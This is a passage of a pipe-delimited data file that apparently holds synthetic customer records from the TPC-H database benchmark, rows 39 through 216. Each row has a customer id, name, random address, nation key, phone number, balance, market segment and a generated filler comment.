carefully silent pinto beans sleep carefully fin 39|Customer#000000039|nnbRg,Pvy33dfkorYE FdeZ60|2|12-387-467-6509|6264.31|AUTOMOBILE|tions. slyly silent excuses slee 40|Customer#000000040|gOnGWAyhSV1ofv|3|13-652-915-8939|1335.30|BUILDING|rges impress after the slyly ironic courts. foxes are. blithely 41|Customer#000000041|IM9mzmyoxeBmvNw8lA7G3Ydska2nkZF|10|20-917-711-4011|270.95|HOUSEHOLD|ly regular accounts hang bold, silent packages. unusual foxes haggle slyly above the special, final depo 42|Customer#000000042|ziSrvyyBke|5|15-416-330-4175|8727.01|BUILDING|ssly according to the pinto beans: carefully special requests across the even, pending accounts wake special 43|Customer#000000043|ouSbjHk8lh5fKX3zGso3ZSIj9Aa3PoaFd|19|29-316-665-2897|9904.28|MACHINERY|ial requests: carefully pending foxes detect quickly. carefully final courts cajole quickly. carefully 44|Customer#000000044|Oi,dOSPwDu4jo4x,,P85E0dmhZGvNtBwi|16|26-190-260-5375|7315.94|AUTOMOBILE|r requests around the unusual, bold a 45|Customer#000000045|4v3OcpFgoOmMG,CbnF,4mdC|9|19-715-298-9917|9983.38|AUTOMOBILE|nto beans haggle slyly alongside of t 46|Customer#000000046|eaTXWWm10L9|6|16-357-681-2007|5744.59|AUTOMOBILE|ctions. accounts sleep furiously even requests. regular, regular accounts cajole blithely around the final pa 47|Customer#000000047|b0UgocSqEW5 gdVbhNT|2|12-427-271-9466|274.58|BUILDING|ions. express, ironic instructions sleep furiously ironic ideas. furi 48|Customer#000000048|0UU iPhBupFvemNB|0|10-508-348-5882|3792.50|BUILDING|re fluffily pending foxes. pending, bold platelets sleep slyly. even platelets cajo 49|Customer#000000049|cNgAeX7Fqrdf7HQN9EwjUa4nxT,68L FKAxzl|10|20-908-631-4424|4573.94|FURNITURE|nusual foxes! fluffily pending packages maintain to the regular 50|Customer#000000050|9SzDYlkzxByyJ1QeTI o|6|16-658-112-3221|4266.13|MACHINERY|ts. furiously ironic accounts cajole furiously slyly ironic dinos. 51|Customer#000000051|uR,wEaiTvo4|12|22-344-885-4251|855.87|FURNITURE|eposits. 
furiously regular requests integrate carefully packages. furious 52|Customer#000000052|7 QOqGqqSy9jfV51BC71jcHJSD0|11|21-186-284-5998|5630.28|HOUSEHOLD|ic platelets use evenly even accounts. stealthy theodolites cajole furiou 53|Customer#000000053|HnaxHzTfFTZs8MuCpJyTbZ47Cm4wFOOgib|15|25-168-852-5363|4113.64|HOUSEHOLD|ar accounts are. even foxes are blithely. fluffily pending deposits boost 54|Customer#000000054|,k4vf 5vECGWFy,hosTE,|4|14-776-370-4745|868.90|AUTOMOBILE|sual, silent accounts. furiously express accounts cajole special deposits. final, final accounts use furi 55|Customer#000000055|zIRBR4KNEl HzaiV3a i9n6elrxzDEh8r8pDom|10|20-180-440-8525|4572.11|MACHINERY|ully unusual packages wake bravely bold packages. unusual requests boost deposits! blithely ironic packages ab 56|Customer#000000056|BJYZYJQk4yD5B|10|20-895-685-6920|6530.86|FURNITURE|. notornis wake carefully. carefully fluffy requests are furiously even accounts. slyly expre 57|Customer#000000057|97XYbsuOPRXPWU|21|31-835-306-1650|4151.93|AUTOMOBILE|ove the carefully special packages. even, unusual deposits sleep slyly pend 58|Customer#000000058|g9ap7Dk1Sv9fcXEWjpMYpBZIRUohi T|13|23-244-493-2508|6478.46|HOUSEHOLD|ideas. ironic ideas affix furiously express, final instructions. regular excuses use quickly e 59|Customer#000000059|zLOCP0wh92OtBihgspOGl4|1|11-355-584-3112|3458.60|MACHINERY|ously final packages haggle blithely after the express deposits. furiou 60|Customer#000000060|FyodhjwMChsZmUz7Jz0H|12|22-480-575-5866|2741.87|MACHINERY|latelets. blithely unusual courts boost furiously about the packages. blithely final instruct 61|Customer#000000061|9kndve4EAJxhg3veF BfXr7AqOsT39o gtqjaYE|17|27-626-559-8599|1536.24|FURNITURE|egular packages shall have to impress along the 62|Customer#000000062|upJK2Dnw13,|7|17-361-978-7059|595.61|MACHINERY|kly special dolphins. pinto beans are slyly. 
quickly regular accounts are furiously a 63|Customer#000000063|IXRSpVWWZraKII|21|31-952-552-9584|9331.13|AUTOMOBILE|ithely even accounts detect slyly above the fluffily ir 64|Customer#000000064|MbCeGY20kaKK3oalJD,OT|3|13-558-731-7204|-646.64|BUILDING|structions after the quietly ironic theodolites cajole be 65|Customer#000000065|RGT yzQ0y4l0H90P783LG4U95bXQFDRXbWa1sl,X|23|33-733-623-5267|8795.16|AUTOMOBILE|y final foxes serve carefully. theodolites are carefully. pending i 66|Customer#000000066|XbsEqXH1ETbJYYtA1A|22|32-213-373-5094|242.77|HOUSEHOLD|le slyly accounts. carefully silent packages benea 67|Customer#000000067|rfG0cOgtr5W8 xILkwp9fpCS8|9|19-403-114-4356|8166.59|MACHINERY|indle furiously final, even theodo 68|Customer#000000068|o8AibcCRkXvQFh8hF,7o|12|22-918-832-2411|6853.37|HOUSEHOLD| pending pinto beans impress realms. final dependencies 69|Customer#000000069|Ltx17nO9Wwhtdbe9QZVxNgP98V7xW97uvSH1prEw|9|19-225-978-5670|1709.28|HOUSEHOLD|thely final ideas around the quickly final dependencies affix carefully quickly final theodolites. final accounts c 70|Customer#000000070|mFowIuhnHjp2GjCiYYavkW kUwOjIaTCQ|22|32-828-107-2832|4867.52|FURNITURE|fter the special asymptotes. ideas after the unusual frets cajole quickly regular pinto be 71|Customer#000000071|TlGalgdXWBmMV,6agLyWYDyIz9MKzcY8gl,w6t1B|7|17-710-812-5403|-611.19|HOUSEHOLD|g courts across the regular, final pinto beans are blithely pending ac 72|Customer#000000072|putjlmskxE,zs,HqeIA9Wqu7dhgH5BVCwDwHHcf|2|12-759-144-9689|-362.86|FURNITURE|ithely final foxes sleep always quickly bold accounts. final wat 73|Customer#000000073|8IhIxreu4Ug6tt5mog4|0|10-473-439-3214|4288.50|BUILDING|usual, unusual packages sleep busily along the furiou 74|Customer#000000074|IkJHCA3ZThF7qL7VKcrU nRLl,kylf |4|14-199-862-7209|2764.43|MACHINERY|onic accounts. blithely slow packages would haggle carefully. 
qui 75|Customer#000000075|Dh 6jZ,cwxWLKQfRKkiGrzv6pm|18|28-247-803-9025|6684.10|AUTOMOBILE| instructions cajole even, even deposits. finally bold deposits use above the even pains. slyl 76|Customer#000000076|m3sbCvjMOHyaOofH,e UkGPtqc4|0|10-349-718-3044|5745.33|FURNITURE|pecial deposits. ironic ideas boost blithely according to the closely ironic theodolites! furiously final deposits n 77|Customer#000000077|4tAE5KdMFGD4byHtXF92vx|17|27-269-357-4674|1738.87|BUILDING|uffily silent requests. carefully ironic asymptotes among the ironic hockey players are carefully bli 78|Customer#000000078|HBOta,ZNqpg3U2cSL0kbrftkPwzX|9|19-960-700-9191|7136.97|FURNITURE|ests. blithely bold pinto beans h 79|Customer#000000079|n5hH2ftkVRwW8idtD,BmM2|15|25-147-850-4166|5121.28|MACHINERY|es. packages haggle furiously. regular, special requests poach after the quickly express ideas. blithely pending re 80|Customer#000000080|K,vtXp8qYB |0|10-267-172-7101|7383.53|FURNITURE|tect among the dependencies. bold accounts engage closely even pinto beans. ca 81|Customer#000000081|SH6lPA7JiiNC6dNTrR|20|30-165-277-3269|2023.71|BUILDING|r packages. fluffily ironic requests cajole fluffily. ironically regular theodolit 82|Customer#000000082|zhG3EZbap4c992Gj3bK,3Ne,Xn|18|28-159-442-5305|9468.34|AUTOMOBILE|s wake. bravely regular accounts are furiously. regula 83|Customer#000000083|HnhTNB5xpnSF20JBH4Ycs6psVnkC3RDf|22|32-817-154-4122|6463.51|BUILDING|ccording to the quickly bold warhorses. final, regular foxes integrate carefully. bold packages nag blithely ev 84|Customer#000000084|lpXz6Fwr9945rnbtMc8PlueilS1WmASr CB|11|21-546-818-3802|5174.71|FURNITURE|ly blithe foxes. special asymptotes haggle blithely against the furiously regular depo 85|Customer#000000085|siRerlDwiolhYR 8FgksoezycLj|5|15-745-585-8219|3386.64|FURNITURE|ronic ideas use above the slowly pendin 86|Customer#000000086|US6EGGHXbTTXPL9SBsxQJsuvy|0|10-677-951-2353|3306.32|HOUSEHOLD|quests. 
pending dugouts are carefully aroun 87|Customer#000000087|hgGhHVSWQl 6jZ6Ev|23|33-869-884-7053|6327.54|FURNITURE|hely ironic requests integrate according to the ironic accounts. slyly regular pla 88|Customer#000000088|wtkjBN9eyrFuENSMmMFlJ3e7jE5KXcg|16|26-516-273-2566|8031.44|AUTOMOBILE|s are quickly above the quickly ironic instructions; even requests about the carefully final deposi 89|Customer#000000089|dtR, y9JQWUO6FoJExyp8whOU|14|24-394-451-5404|1530.76|FURNITURE|counts are slyly beyond the slyly final accounts. quickly final ideas wake. r 90|Customer#000000090|QxCzH7VxxYUWwfL7|16|26-603-491-1238|7354.23|BUILDING|sly across the furiously even 91|Customer#000000091|S8OMYFrpHwoNHaGBeuS6E 6zhHGZiprw1b7 q|8|18-239-400-3677|4643.14|AUTOMOBILE|onic accounts. fluffily silent pinto beans boost blithely according to the fluffily exp 92|Customer#000000092|obP PULk2LH LqNF,K9hcbNqnLAkJVsl5xqSrY,|2|12-446-416-8471|1182.91|MACHINERY|. pinto beans hang slyly final deposits. ac 93|Customer#000000093|EHXBr2QGdh|7|17-359-388-5266|2182.52|MACHINERY|press deposits. carefully regular platelets r 94|Customer#000000094|IfVNIN9KtkScJ9dUjK3Pg5gY1aFeaXewwf|9|19-953-499-8833|5500.11|HOUSEHOLD|latelets across the bold, final requests sleep according to the fluffily bold accounts. unusual deposits amon 95|Customer#000000095|EU0xvmWvOmUUn5J,2z85DQyG7QCJ9Xq7|15|25-923-255-2929|5327.38|MACHINERY|ithely. ruthlessly final requests wake slyly alongside of the furiously silent pinto beans. even the 96|Customer#000000096|vWLOrmXhRR|8|18-422-845-1202|6323.92|AUTOMOBILE|press requests believe furiously. carefully final instructions snooze carefully. 97|Customer#000000097|OApyejbhJG,0Iw3j rd1M|17|27-588-919-5638|2164.48|AUTOMOBILE|haggle slyly. bold, special ideas are blithely above the thinly bold theo 98|Customer#000000098|7yiheXNSpuEAwbswDW|12|22-885-845-6889|-551.37|BUILDING|ages. 
furiously pending accounts are quickly carefully final foxes: busily pe 99|Customer#000000099|szsrOiPtCHVS97Lt|15|25-515-237-9232|4088.65|HOUSEHOLD|cajole slyly about the regular theodolites! furiously bold requests nag along the pending, regular packages. somas 100|Customer#000000100|fptUABXcmkC5Wx|20|30-749-445-4907|9889.89|FURNITURE|was furiously fluffily quiet deposits. silent, pending requests boost against 101|Customer#000000101|sMmL2rNeHDltovSm Y|2|12-514-298-3699|7470.96|MACHINERY| sleep. pending packages detect slyly ironic pack 102|Customer#000000102|UAtflJ06 fn9zBfKjInkQZlWtqaA|19|29-324-978-8538|8462.17|BUILDING|ously regular dependencies nag among the furiously express dinos. blithely final 103|Customer#000000103|8KIsQX4LJ7QMsj6DrtFtXu0nUEdV,8a|9|19-216-107-2107|2757.45|BUILDING|furiously pending notornis boost slyly around the blithely ironic ideas? final, even instructions cajole fl 104|Customer#000000104|9mcCK L7rt0SwiYtrbO88DiZS7U d7M|10|20-966-284-8065|-588.38|FURNITURE|rate carefully slyly special pla 105|Customer#000000105|4iSJe4L SPjg7kJj98Yz3z0B|10|20-793-553-6417|9091.82|MACHINERY|l pains cajole even accounts. quietly final instructi 106|Customer#000000106|xGCOEAUjUNG|1|11-751-989-4627|3288.42|MACHINERY|lose slyly. ironic accounts along the evenly regular theodolites wake about the special, final gifts. 107|Customer#000000107|Zwg64UZ,q7GRqo3zm7P1tZIRshBDz|15|25-336-529-9919|2514.15|AUTOMOBILE|counts cajole slyly. regular requests wake. furiously regular deposits about the blithely final fo 108|Customer#000000108|GPoeEvpKo1|5|15-908-619-7526|2259.38|BUILDING|refully ironic deposits sleep. regular, unusual requests wake slyly 109|Customer#000000109|OOOkYBgCMzgMQXUmkocoLb56rfrdWp2NE2c|16|26-992-422-8153|-716.10|BUILDING|es. fluffily final dependencies sleep along the blithely even pinto beans. 
final deposits haggle furiously furiou 110|Customer#000000110|mymPfgphaYXNYtk|10|20-893-536-2069|7462.99|AUTOMOBILE|nto beans cajole around the even, final deposits. quickly bold packages according to the furiously regular dept 111|Customer#000000111|CBSbPyOWRorloj2TBvrK9qp9tHBs|22|32-582-283-7528|6505.26|MACHINERY|ly unusual instructions detect fluffily special deposits-- theodolites nag carefully during the ironic dependencies 112|Customer#000000112|RcfgG3bO7QeCnfjqJT1|19|29-233-262-8382|2953.35|FURNITURE|rmanently unusual multipliers. blithely ruthless deposits are furiously along the 113|Customer#000000113|eaOl5UBXIvdY57rglaIzqvfPD,MYfK|12|22-302-930-4756|2912.00|BUILDING|usly regular theodolites boost furiously doggedly pending instructio 114|Customer#000000114|xAt 5f5AlFIU|14|24-805-212-7646|1027.46|FURNITURE|der the carefully express theodolites are after the packages. packages are. bli 115|Customer#000000115|0WFt1IXENmUT2BgbsB0ShVKJZt0HCBCbFl0aHc|8|18-971-699-1843|7508.92|HOUSEHOLD|sits haggle above the carefully ironic theodolite 116|Customer#000000116|yCuVxIgsZ3,qyK2rloThy3u|16|26-632-309-5792|8403.99|BUILDING|as. quickly final sauternes haggle slyly carefully even packages. brave, ironic pinto beans are above the furious 117|Customer#000000117|uNhM,PzsRA3S,5Y Ge5Npuhi|24|34-403-631-3505|3950.83|FURNITURE|affix. instructions are furiously sl 118|Customer#000000118|OVnFuHygK9wx3xpg8|18|28-639-943-7051|3582.37|AUTOMOBILE|uick packages alongside of the furiously final deposits haggle above the fluffily even foxes. blithely dogged dep 119|Customer#000000119|M1ETOIecuvH8DtM0Y0nryXfW|7|17-697-919-8406|3930.35|FURNITURE|express ideas. blithely ironic foxes thrash. special acco 120|Customer#000000120|zBNna00AEInqyO1|12|22-291-534-1571|363.75|MACHINERY| quickly. slyly ironic requests cajole blithely furiously final dependen 121|Customer#000000121|tv nCR2YKupGN73mQudO|17|27-411-990-2959|6428.32|BUILDING|uriously stealthy ideas. 
carefully final courts use carefully 122|Customer#000000122|yp5slqoNd26lAENZW3a67wSfXA6hTF|3|13-702-694-4520|7865.46|HOUSEHOLD| the special packages hinder blithely around the permanent requests. bold depos 123|Customer#000000123|YsOnaaER8MkvK5cpf4VSlq|5|15-817-151-1168|5897.83|BUILDING|ependencies. regular, ironic requests are fluffily regu 124|Customer#000000124|aTbyVAW5tCd,v09O|18|28-183-750-7809|1842.49|AUTOMOBILE|le fluffily even dependencies. quietly s 125|Customer#000000125|,wSZXdVR xxIIfm9s8ITyLl3kgjT6UC07GY0Y|19|29-261-996-3120|-234.12|FURNITURE|x-ray finally after the packages? regular requests c 126|Customer#000000126|ha4EHmbx3kg DYCsP6DFeUOmavtQlHhcfaqr|22|32-755-914-7592|1001.39|HOUSEHOLD|s about the even instructions boost carefully furiously ironic pearls. ruthless, 127|Customer#000000127|Xyge4DX2rXKxXyye1Z47LeLVEYMLf4Bfcj|21|31-101-672-2951|9280.71|MACHINERY|ic, unusual theodolites nod silently after the final, ironic instructions: pending r 128|Customer#000000128|AmKUMlJf2NRHcKGmKjLS|4|14-280-874-8044|-986.96|HOUSEHOLD|ing packages integrate across the slyly unusual dugouts. blithely silent ideas sublate carefully. blithely expr 129|Customer#000000129|q7m7rbMM0BpaCdmxloCgBDRCleXsXkdD8kf|7|17-415-148-7416|9127.27|HOUSEHOLD| unusual deposits boost carefully furiously silent ideas. pending accounts cajole slyly across 130|Customer#000000130|RKPx2OfZy0Vn 8wGWZ7F2EAvmMORl1k8iH|9|19-190-993-9281|5073.58|HOUSEHOLD|ix slowly. express packages along the furiously ironic requests integrate daringly deposits. fur 131|Customer#000000131|jyN6lAjb1FtH10rMC,XzlWyCBrg75|11|21-840-210-3572|8595.53|HOUSEHOLD|jole special packages. furiously final dependencies about the furiously speci 132|Customer#000000132|QM5YabAsTLp9|4|14-692-150-9717|162.57|HOUSEHOLD|uickly carefully special theodolites. carefully regular requests against the blithely unusual instructions 133|Customer#000000133|IMCuXdpIvdkYO92kgDGuyHgojcUs88p|17|27-408-997-8430|2314.67|AUTOMOBILE|t packages. 
express pinto beans are blithely along the unusual, even theodolites. silent packages use fu 134|Customer#000000134|sUiZ78QCkTQPICKpA9OBzkUp2FM|11|21-200-159-5932|4608.90|BUILDING|yly fluffy foxes boost final ideas. b 135|Customer#000000135|oZK,oC0 fdEpqUML|19|29-399-293-6241|8732.91|FURNITURE| the slyly final accounts. deposits cajole carefully. carefully sly packag 136|Customer#000000136|QoLsJ0v5C1IQbh,DS1|7|17-501-210-4726|-842.39|FURNITURE|ackages sleep ironic, final courts. even requests above the blithely bold requests g 137|Customer#000000137|cdW91p92rlAEHgJafqYyxf1Q|16|26-777-409-5654|7838.30|HOUSEHOLD|carefully regular theodolites use. silent dolphins cajo 138|Customer#000000138|5uyLAeY7HIGZqtu66Yn08f|5|15-394-860-4589|430.59|MACHINERY|ts doze on the busy ideas. regular 139|Customer#000000139|3ElvBwudHKL02732YexGVFVt |9|19-140-352-1403|7897.78|MACHINERY|nstructions. quickly ironic ideas are carefully. bold, 140|Customer#000000140|XRqEPiKgcETII,iOLDZp5jA|4|14-273-885-6505|9963.15|MACHINERY|ies detect slyly ironic accounts. slyly ironic theodolites hag 141|Customer#000000141|5IW,WROVnikc3l7DwiUDGQNGsLBGOL6Dc0|1|11-936-295-6204|6706.14|FURNITURE|packages nag furiously. carefully unusual accounts snooze according to the fluffily regular pinto beans. slyly spec 142|Customer#000000142|AnJ5lxtLjioClr2khl9pb8NLxG2,|9|19-407-425-2584|2209.81|AUTOMOBILE|. even, express theodolites upo 143|Customer#000000143|681r22uL452zqk 8By7I9o9enQfx0|16|26-314-406-7725|2186.50|MACHINERY|across the blithely unusual requests haggle theodo 144|Customer#000000144|VxYZ3ebhgbltnetaGjNC8qCccjYU05 fePLOno8y|1|11-717-379-4478|6417.31|MACHINERY|ges. slyly regular accounts are slyly. bold, idle reque 145|Customer#000000145|kQjHmt2kcec cy3hfMh969u|13|23-562-444-8454|9748.93|HOUSEHOLD|ests? express, express instructions use. blithely fina 146|Customer#000000146|GdxkdXG9u7iyI1,,y5tq4ZyrcEy|3|13-835-723-3223|3328.68|FURNITURE|ffily regular dinos are slyly unusual requests. 
slyly specia 147|Customer#000000147|6VvIwbVdmcsMzuu,C84GtBWPaipGfi7DV|18|28-803-187-4335|8071.40|AUTOMOBILE|ress packages above the blithely regular packages sleep fluffily blithely ironic accounts. 148|Customer#000000148|BhSPlEWGvIJyT9swk vCWE|11|21-562-498-6636|2135.60|HOUSEHOLD|ing to the carefully ironic requests. carefully regular dependencies about the theodolites wake furious 149|Customer#000000149|3byTHCp2mNLPigUrrq|19|29-797-439-6760|8959.65|AUTOMOBILE|al instructions haggle against the slyly bold w 150|Customer#000000150|zeoGShTjCwGPplOWFkLURrh41O0AZ8dwNEEN4 |18|28-328-564-7630|3849.48|MACHINERY|ole blithely among the furiously pending packages. furiously bold ideas wake fluffily ironic idea 151|Customer#000000151|LlyEtNEXT6kkZ,kGP46H|19|29-433-197-6339|5187.02|HOUSEHOLD|regular dugouts: blithely even dolphins cajole furiously carefull 152|Customer#000000152|PDrllSkScKLh4lr19gmUZnK|8|18-585-850-3926|1215.18|BUILDING|ously ironic accounts. furiously even accounts accord 153|Customer#000000153|kDzx11sIjjWJm1|6|16-342-316-2815|5454.26|HOUSEHOLD|promise carefully. unusual deposits x-ray. carefully regular tithes u 154|Customer#000000154|2LAlU fDHkOqbXjHHDqw1mJQNC|19|29-522-835-6914|4695.12|FURNITURE|nic packages haggle blithely across the 155|Customer#000000155|l,sSphiStMgdrxpxi|0|10-566-282-8705|5902.85|AUTOMOBILE| sleep ironic, bold requests. regular packages on the quiet dependencies 156|Customer#000000156|5OS0edX2Y6B1cf9wJNuOQWgrrZccXk9|9|19-723-913-3943|9302.95|AUTOMOBILE| regular foxes above the theodolites haggle 157|Customer#000000157|HGEouzCcFrNd nBAdsCRjsMxKOvYZdbwA7he5w9v|15|25-207-442-1556|9768.73|BUILDING| pinto beans against the carefully bold requests wake quickly alongside of the final accounts. accounts 158|Customer#000000158|2HaYxi0J1620aoI1CdFyrW,rWOy|10|20-383-680-1329|6160.95|AUTOMOBILE|ecoys. 
fluffily quick requests use flu 159|Customer#000000159|KotsdDO6EHnysVu922s6pjZpG,vlT|10|20-888-668-2668|2060.06|HOUSEHOLD|cingly express somas haggle above the theodolites. pinto beans use special theodolites. theodolites sleep 160|Customer#000000160|5soVQ3dOCRBWBS|13|23-428-666-4806|4363.17|MACHINERY|olites. silently ironic accounts cajole furious 161|Customer#000000161|2oRkx,NtjFUh|7|17-805-718-2449|3714.06|MACHINERY|ptotes nag carefully instructions. silent accounts are. furiously even accounts alongside 162|Customer#000000162|JE398sXZt2QuKXfJd7poNpyQFLFtth|8|18-131-101-2267|6268.99|MACHINERY|accounts along the doggedly special asymptotes boost blithely during the quickly regular theodolites. slyly 163|Customer#000000163|OgrGcOnm4whd0f|21|31-863-349-4121|2948.61|FURNITURE| nag furiously furiously final requests. slyly s 164|Customer#000000164|YDW51PBWLXLnbQlKC|4|14-565-638-9768|208.45|HOUSEHOLD|ironic, special pinto beans. ironic 165|Customer#000000165|8pc6kwBmwBdEnfVP53aqL9DM4LymC4|0|10-927-209-5601|3349.92|HOUSEHOLD| requests. final ideas cajole quickly at the special, ironic acco 166|Customer#000000166|15HWGtwoP77EJfd95HxtMSTZUelV8NOKne2|10|20-320-530-5920|2042.21|FURNITURE|the packages. blithely final packages are furiously unusual asymptotes. regular frets promise carefully u 167|Customer#000000167|QNc2eOlRIzL6jpthwgDuB866uCIUPiOX|5|15-288-395-5501|1468.09|AUTOMOBILE|espite the ironic excuses. furiously final deposits wake slyly. slyly ex 168|Customer#000000168|GDcL5qU86P8,oaTwVBCLE6asM8rlxpE,211uziU|12|22-354-984-5361|-808.56|FURNITURE|blithely final accounts sleep quickly along the regular ideas. furiously sly foxes nag across the 169|Customer#000000169|NjhmHa7xrcjE|18|28-362-499-3728|4483.83|FURNITURE|fully unusual pinto beans. blithely express asymptotes lose carefully regular instructions? accounts b 170|Customer#000000170|5QmxmYubNhn6HAgLwTvphevM3OmpZTGsM|15|25-879-984-9818|7687.89|BUILDING| regular requests. 
carefully regu 171|Customer#000000171|RIhjJCrth89EU7xRSvN|7|17-513-603-7451|2379.91|MACHINERY|ly furiously final requests. slyly final requests wake silently pending, silent accounts. exp 172|Customer#000000172|KwgdKUL1G2WacsMNF50yX|22|32-178-964-1847|1134.40|MACHINERY|losely regular, unusual instructions. 173|Customer#000000173|Aue7KVz,FinSHpov Vk5ed,wSQ2BRSioJ0|9|19-443-196-8008|845.84|BUILDING|s pinto beans use thinly slyly regular packages. instructions print along the s 174|Customer#000000174|R5 fCPMSeDXtUpp5Ax|23|33-845-455-8799|1944.73|FURNITURE|oldly even requests haggle quickly blithely ironic accounts. idly final foxes doze slyly pending dep 175|Customer#000000175|8YK1ZyTqoY3wMWnExl4itPMLL793GpEZb6T|10|20-427-617-9922|1975.35|FURNITURE|ly final platelets are final pinto b 176|Customer#000000176|9hBepY2uz88HlCqToOLgeU770u81FeL|13|23-432-942-8830|-375.76|FURNITURE|uriously. final requests sleep ironic packages. quickly 177|Customer#000000177|6wzEKPyZE9dmBCJZ8e7x7fiiK,k|1|11-917-786-9955|7457.50|BUILDING|nal dolphins: blithely bold gifts wake slyly afte 178|Customer#000000178|p HUSDg8Cgan4Fj8Drvcdz4gi4dSqV0a7n 0ag|21|31-436-268-6327|2272.50|FURNITURE|unts. blithely regular dependencies kindle pending deposits. quietly express deposits wake above the Tiresias-- ex 179|Customer#000000179|djez3CWg0nnCiu60jsF|4|14-703-953-2987|-43.08|MACHINERY|st furiously. idly regular instructions wake fluffily slyl 180|Customer#000000180|DSGW3RFoYJE opVw,Y3wGCGcNULZi|13|23-678-802-2105|-92.58|FURNITURE|lar accounts sublate above the slyly final 181|Customer#000000181|YNviWd WrRkZvSw1OxIewBq|9|19-653-305-8440|3929.96|FURNITURE|final requests cajole furiously acro 182|Customer#000000182|tdwvgepG316CCTHtMaF8Q|3|13-199-211-9023|4810.22|AUTOMOBILE|quickly against the blithely even deposits; epitaphs unwind quickly along the carefully regular excuses. 
furio 183|Customer#000000183|aMAB2QSb8 86MAx|22|32-771-279-8154|4419.89|HOUSEHOLD|sual accounts across the slyl 184|Customer#000000184|uoOpBuRr42f1WIqnVYAhxbAA9bkK6HUGpOt|21|31-739-340-5476|170.46|AUTOMOBILE|hely according to the furiously unusual accounts. furiously bold platele 185|Customer#000000185|iHXzQgienOQ|5|15-760-572-8760|2788.76|BUILDING|t the ironic accounts. fluffily regular requests wake slyly ironic pinto beans. slyly unusu 186|Customer#000000186|BeVr6MzaobBENXRBC8pmOmkByMJI|3|13-518-743-2576|8737.50|HOUSEHOLD|e slyly final dependencies. unusual instructions against the carefully pending instructions boost quickly 187|Customer#000000187|OIlgR6oIRXV5g63q5YGudCjRD8kpod2p|4|14-716-294-6674|-774.22|FURNITURE|r deposits. carefully silent packages after the fluffily even instructio 188|Customer#000000188|58Srs6gEEoD3ZfwgXDM1OayRiaSY6K9YsveWwV|5|15-613-528-7811|9533.37|BUILDING|st slyly special platelets. bold, 189|Customer#000000189|r51HSq Rg8wQgF1CBfG1Vbye3GK|22|32-980-348-1114|-594.05|MACHINERY|sly express patterns. ideas on the regular d 190|Customer#000000190|F2X,GhSqLz8k u0gWsirsraFaEDEo6vIGtOTaO1T|11|21-730-373-8193|1657.46|AUTOMOBILE|uickly-- fluffily pending instructions boo 191|Customer#000000191|P1eCXsPWkv2y6ENQv|16|26-811-707-6869|2945.16|BUILDING|o beans hinder slyly bold accounts. 192|Customer#000000192|rDmB2c9d1BJQ y6R9jTx86YI77D|10|20-750-712-2481|8239.96|MACHINERY|ely unusual packages are fluffily 193|Customer#000000193|dUT4dtsPTZ6ZpkWLc,KGJCHY6JDJgPFH4|23|33-182-978-6287|8024.55|MACHINERY|y even theodolites. final foxes print along the final pinto beans. theodoli 194|Customer#000000194|mksKhdWuQ1pjbc4yffHp8rRmLOMcJ|16|26-597-636-3003|6696.49|HOUSEHOLD|quickly across the fluffily dogged requests. regular platelets around the ironic, even requests cajole quickl 195|Customer#000000195|WiqQD8hscyKekjMcSBA7AX 0AbxvBV|22|32-757-684-6845|4873.91|AUTOMOBILE| should detect blithely. 
quickly even packages above the deposits wak 196|Customer#000000196|68RstNo6a2B|18|28-135-177-2472|7760.33|FURNITURE|accounts wake. express instructions according to the s 197|Customer#000000197|UeVqssepNuXmtZ38D|1|11-107-312-6585|9860.22|AUTOMOBILE|ickly final accounts cajole. furiously re 198|Customer#000000198|,7fcZHIUn,fUaQtK8U,Q8|1|11-237-758-6141|3824.76|AUTOMOBILE|tions. slyly ironic waters wa 199|Customer#000000199|lBU3xll,a7e9TYm3 UyjDPCVMvnHKpq,9HW1X|4|14-136-924-5232|7654.31|FURNITURE|fully busy pinto beans. packages cajole around the express, bold packages! quickly ironic tithes 200|Customer#000000200|x1 H5c66DUgH2pgNTJhw6eZKgrAz|16|26-472-302-4189|9967.60|BUILDING|e after the ironic, even realms. fluffily regular packages doze-- courts haggle carefully! blithely 201|Customer#000000201|yWLtmd5usyjsCvyL1QJsBorC|2|12-759-183-9859|4614.40|MACHINERY| blithely even packages sleep carefully bold, unus 202|Customer#000000202|Q0uJ1frCbi9yvu|7|17-905-805-4635|2237.64|AUTOMOBILE|fully along the carefully pending Tiresias; special packages along the carefully special deposits try to 203|Customer#000000203|2fRlubh lWRinCs1nimADdn|1|11-886-563-6149|7960.63|MACHINERY| packages are. requests integrate regularly across th 204|Customer#000000204|7U7u2KryFP|6|16-761-837-4820|-627.76|BUILDING|ages. accounts wake slyly. dolphins nag blithely. final, regular requests haggle blithely furiously even 205|Customer#000000205|jOTQBGb nhfBMu3,LIN62WogLDBO0w|12|22-356-437-1311|7161.52|BUILDING| furiously pending accounts. ideas along the slyly final deposits cajole blithel 206|Customer#000000206|xsg,ehRHS5OKqyBR5YtoPm8myz|9|19-976-832-3312|-274.79|AUTOMOBILE| the carefully regular foxes. regular accounts wake furiously braids. bold ideas are carefu 207|Customer#000000207|ewz5JNnxJPmPGY|21|31-562-675-6475|-439.98|AUTOMOBILE|n theodolites against the evenly even requests boost carefully pinto beans! 
fi 208|Customer#000000208|Abye1MwcNfY0KO6yqv,Wwe|19|29-859-139-6234|6239.89|MACHINERY|le carefully according to the quickly silent packages. quickly ironic packages affix according to the ruthles 209|Customer#000000209|iBvmxOZV3qXMYQW3W4Oo7YFhdV|16|26-207-121-7721|8873.46|FURNITURE|deposits. furiously regular ideas across the quietly regular accounts cajole about the express packages. quickly reg 210|Customer#000000210|13cFL9sG1nrGERURN9WZI0|20|30-876-248-9750|7250.14|HOUSEHOLD|nusual instructions sleep regular acc 211|Customer#000000211|URhlVPzz4FqXem|13|23-965-335-9471|4198.72|BUILDING|furiously regular foxes boost fluffily special ideas. carefully regular dependencies are. slyly ironic 212|Customer#000000212|19U0iZ3GtDdrsn|7|17-382-405-4333|957.58|BUILDING|symptotes are blithely special pinto beans. blithely ironic 213|Customer#000000213|NpqMYBhBcWk8mnEta|24|34-768-700-9764|9987.71|HOUSEHOLD|al deposits. final instructions boost carefully. even deposits sleep quickly. furiously regul 214|Customer#000000214|MpCwhcLrbcIM7AeKS9tRM09by|8|18-180-678-6165|1526.59|MACHINERY|grow. fluffily regular pinto beans according to the regular accounts affix quickly pe 215|Customer#000000215|8H76xbBhde HY70BrYqGEFmVPXqlm8pgjjxh|9|19-564-446-4758|3379.20|FURNITURE|al pinto beans. ironic foxes serve. i 216|Customer#000000216|LXH7wSv4I6GG6TAkLOyLcMh559a8Y|21|31-296-111-5448|-776.08|FURNITURE|hely at the pending warhorses; blithe 